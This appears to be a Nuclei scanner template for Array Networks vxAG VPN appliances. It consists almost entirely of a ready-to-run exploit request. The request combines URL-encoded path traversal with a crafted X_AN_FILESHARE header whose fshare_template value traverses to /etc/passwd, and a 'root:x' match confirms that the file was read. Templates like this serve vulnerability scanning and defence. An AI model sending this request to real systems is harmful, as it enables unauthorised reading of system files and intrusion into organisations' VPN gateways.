id: Arrayvpn
info:
  name: Array Networks vxAG
  author: qiuzhi
  severity: critical
  reference:
    - https://wzt.ac.cn/2022/12/20/ArrayVPN_rce2/
  metadata:
    fofa-query: 

requests:
  - raw:
      - |
        GET /prx/000/http/localhost/client_sec/%2e%2e/addfolder HTTP/1.1
        Host: {{Hostname}}
        X_AN_FILESHARE: uname=t; password=t; sp_uname=t; flags=c3248;fshare_template=../../../../../../../../../../etc/passwd;



    matchers-condition: and
    matchers:
      - type: word
        regex:
          - "root:x"